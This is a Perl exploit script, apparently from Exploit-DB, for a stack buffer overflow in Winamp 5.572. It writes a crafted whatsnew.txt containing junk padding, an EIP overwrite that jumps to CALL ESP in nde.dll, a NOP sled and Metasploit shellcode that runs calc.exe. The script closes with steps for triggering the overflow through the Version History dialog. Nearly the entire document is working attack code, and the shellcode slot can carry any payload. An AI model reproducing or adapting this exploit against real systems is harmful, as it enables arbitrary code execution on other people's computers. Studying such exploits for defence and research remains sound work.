# Exploit Title: Winamp 5.572 local buffer overflow # Date: 25-01-2010 # Author: NeoCortex - PoC by Debug http://www.exploit-db.com/exploits/11248 # Software Link: http://www.exploit-db.com/application/11248 # Version: 5.572 # Tested on: WinXP SP3 De #!/usr/bin/perl # Still learning, having some fun... # Greetz to _-Sid-_ >Roadkill< Jess Dawn Linki # Special greetz do Debug, even i dont know you. Nice find man. # Exploit has something around 70% chance of success. print "\n#########################################\n"; print "# Winamp 5.572 stack buffer overflow #\n"; print "# PoC by: Debug (eldadru\@gmail.com) #\n"; print "# Exploit by: NeoCortex (ICQ 158005940) #\n"; print "#########################################\n"; print " __ __________________\n"; print " ________ / \\ / / ____ / ____ / ________\n"; print " ________ /_______/ / /\\ \\ / / /___/ / / / / /_______/ ________ \n"; print " /_______/ _______ / / \\ \\ / / /_____/ / / / ________ /_______/\n"; print " /_______/ / / \\ \\/ / /_____/ /___/ / /_______/\n"; print " /_/ \\__/_______/_______/\n"; print " Where's the next phone box to the matrix please?\n\n\n"; my $version = "Winamp 5.572"; my $junk = "\x41" x 540; my $eip = "\xad\x86\x0e\x07"; # overwrite EIP - 070E86AD FFD4 CALL ESP nde.dll my $nop = "\x90" x 100; my $shellcode = # payload taken from http://www.metasploit.com # windows/exec cmd=calc.exe "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49". "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x48\x5a\x6a\x47". "\x58\x30\x42\x31\x50\x42\x41\x6b\x42\x41\x57\x42\x32\x42\x41\x32". "\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x78\x69\x6b\x4c\x6a". "\x48\x53\x74\x67\x70\x67\x70\x75\x50\x4e\x6b\x53\x75\x65\x6c\x6e". "\x6b\x51\x6c\x46\x65\x70\x78\x43\x31\x68\x6f\x4e\x6b\x30\x4f\x54". "\x58\x6e\x6b\x73\x6f\x57\x50\x67\x71\x58\x6b\x77\x39\x4c\x4b\x64". "\x74\x6c\x4b\x57\x71\x5a\x4e\x76\x51\x49\x50\x6e\x79\x6e\x4c\x4f". "\x74\x4b\x70\x70\x74\x37\x77\x69\x51\x48\x4a\x64\x4d\x43\x31\x4f". "\x32\x7a\x4b\x48\x74\x55\x6b\x72\x74\x34\x64\x77\x74\x70\x75\x4d". "\x35\x6c\x4b\x71\x4f\x75\x74\x36\x61\x48\x6b\x41\x76\x4c\x4b\x44". "\x4c\x70\x4b\x4e\x6b\x63\x6f\x55\x4c\x33\x31\x68\x6b\x4e\x6b\x35". "\x4c\x4e\x6b\x34\x41\x6a\x4b\x6c\x49\x33\x6c\x35\x74\x64\x44\x4a". "\x63\x34\x71\x4b\x70\x63\x54\x6e\x6b\x71\x50\x76\x50\x4f\x75\x4b". "\x70\x72\x58\x74\x4c\x4c\x4b\x77\x30\x76\x6c\x4c\x4b\x44\x30\x57". "\x6c\x6c\x6d\x6e\x6b\x75\x38\x54\x48\x58\x6b\x73\x39\x6e\x6b\x4b". "\x30\x4e\x50\x37\x70\x67\x70\x37\x70\x6c\x4b\x62\x48\x45\x6c\x63". "\x6f\x35\x61\x39\x66\x35\x30\x50\x56\x4d\x59\x48\x78\x6e\x63\x59". "\x50\x43\x4b\x66\x30\x43\x58\x68\x70\x6f\x7a\x43\x34\x33\x6f\x73". "\x58\x4f\x68\x6b\x4e\x6d\x5a\x46\x6e\x72\x77\x6b\x4f\x78\x67\x63". "\x53\x62\x41\x30\x6c\x55\x33\x64\x6e\x42\x45\x70\x78\x32\x45\x33". "\x30\x47"; open (myfile,'>> whatsnew.txt'); print myfile $version.$junk.$eip.$nop.$shellcode; print "[+] whatsnew.txt written.\n"; print "[ ] Now copy it to your winamp folder...\n"; print "[ ] Run winamp and hit [About Winamp]->[Version History]\n";